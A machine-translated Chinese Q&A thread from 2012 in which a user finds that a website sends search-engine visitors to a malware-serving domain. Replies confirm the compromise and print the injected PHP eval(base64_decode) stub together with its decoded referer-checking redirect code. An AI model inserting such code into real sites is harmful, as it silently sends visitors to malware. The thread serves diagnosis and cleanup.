我发现一些非常可疑的东西。 在Google链接之后连接到www.pulseexpress.com时,服务器会将您redirect到某个非常可疑的站点,并立即向您发送一个.exe文件:
# host www.pulseexpress.com www.pulseexpress.com has address 173.236.189.124 # netcat 173.236.189.124 80 GET / HTTP/1.1 Host: www.pulseexpress.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Iceweasel/10.0.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Mar 2012 20:53:40 GMT Server: Apache Location: http://www.fdvrerefrr.ezua.com/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html 但是,如果您直接在浏览器中input地址,内容将正常提供:
# netcat 173.236.189.124 80 GET / HTTP/1.1 Host: www.pulseexpress.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Iceweasel/10.0.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 17 Mar 2012 20:53:51 GMT Server: Apache P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40; path=/ Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40 Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53 GMT; path=/ Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4428 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [...]
我的猜测是这个系统已经被攻破了。 另外,这种攻击看起来并不平凡,因为Apacheconfiguration必须修改,只有一些请求被redirect – 可能使得所有者不太可能注意到这个问题。
人们是否同意这种分析?
这种有条件的redirect技术是否是一种新的手工技术,或者这是一个包含在标准攻击软件套件中的例行程序?
是的,该网站已经被妥协,虽然这是一个聪明的黑客攻击,但这并不罕见,我们在过去几个月已经广泛地看到它。 寻找在过去几天/星期修改过的.htaccess文件,他们将充满疯狂的mod_rewrite规则。 保护网站,删除/编辑损坏的文件(我会说“从备份恢复”,但我已经放弃了,甚至试图讨论那些习惯性地运行易受攻击软件的人,并将他们网站的FTP密码保存在他们的易受攻击者桌面上有一个体面的备份制度),该网站将再次罚款。
我刚刚遇到这个问题。 redirect代码被编码在网站上每个PHP文件的顶部…
<?php eval(base64_decode("DQplcnJvcl="));
…解码是…
error_reporting(0); $nccv=headers_sent(); if (!$nccv){ $referer=$_SERVER['HTTP_REFERER']; $ua=$_SERVER['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://www.fdvrerefrr.ezua.com/"); exit(); } } }
你可以在这里find一个解释… http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/